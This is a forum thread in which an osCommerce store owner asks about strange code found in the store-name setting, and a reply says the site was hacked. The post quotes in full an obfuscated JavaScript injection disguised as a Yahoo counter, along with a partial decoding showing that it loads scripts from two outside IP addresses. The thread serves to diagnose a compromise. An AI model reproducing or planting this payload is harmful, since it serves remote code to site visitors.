Wierd code as company name

[davedelage]

A customer complained of an error when sending a contact us email from the osCommerce store. Investigation showed that Admin/Configuration/MyStore/StoreName had been set to (all in one line)

 

</title></a><script>var o=document.links[3];if(o)o.innerHTML=o.innerHTML.replace(/\n([^"]+)/g,'');</script> <script language=javascript><!-- Yahoo! Counter starts if(typeof(yahoo_counter)!=typeof(1))eval(unescape('/#/...` %3Cd%69v&%20#%73%74%79$%6C%65%3D~%64|%69!%73pl~a%79!%3Ano%6E%65%3E@\n~d%6F%63u~%6D#%65nt|.w$%72%69%74~e%28!"%3C@/~%74`%65`x%74`%61!%72!e!%61%3E$%22@%29!;%76%61`%72%20%69#,%5F|%2C!%61=$%5B&%22%378.1&1%30#.1#7%35|%2E#21"~,"@%31@%39%35.2%34|%2E7~%36|.$%32%35%31`%22#];_=1#;i@%66%28d!o%63%75@m%65!%6E!t.@%63oo#%6B#ie.!m|a%74%63~h&(`%2F!%5C%62~h@%67ft%3D%31$%2F%29`%3D~=%6E&%75l$%6C%29%66%6F%72`(@%69`%3D$%30%3B%69%3C%32@%3B%69&+%2B%29~%64#o#%63%75%6D~en%74|%2E%77$%72%69%74&e(~%22`%3C~%73c%72#%69#%70t#%3Ei#%66%28%5F`)%64o!c@u%6D~%65|nt.w%72$%69`t%65%28`%5C#"%3C`s%63~r%69pt#%20$%69%64!%3D`%5F`%22`+`i$%2B%22`%5F$%20%73%72#c&=%2F%2F"#%2B#a[i@%5D#%2B"/%63!%70$%2F%3F~%22%2Bn$%61%76%69@g#at@%6F$%72%2E%61%70%70|N@%61%6D$%65!%2E&%63%68`%61r! %41%74~%280`%29$%2B&"$%3E@%3C$%5C%5C%2F%73|c`ri%70t%3E$%5C%22%29&%3C%5C%2F#s$%63%72%69%70%74!%3E"@%29%3B\n&/!%2F%3C&%2F@%64iv$%3E').replace(/~|\$|\&|\!|\||@|#|`/g,""));var yahoo_counter=1; <!-- counter end --></script>

 

My son decoded part of this to

 

//... <div style=display:none> document.write("");var i,_,a=["78.110.175.21","195.24.76.251"];_=1;if(document.cookie.match(/\bhgft=1/)==null)for(i=0;i<2;i++)document.write("

 

The two IP's go thru Ripe, one of them to Russia!

 

Anyone else seen this or have better data as to what it does or if it's a problem. It seems to have been there for years, not many people email from the store. Most either call or email from the main site.

[germ]

Your site has been hacked.

:o

 

Click Me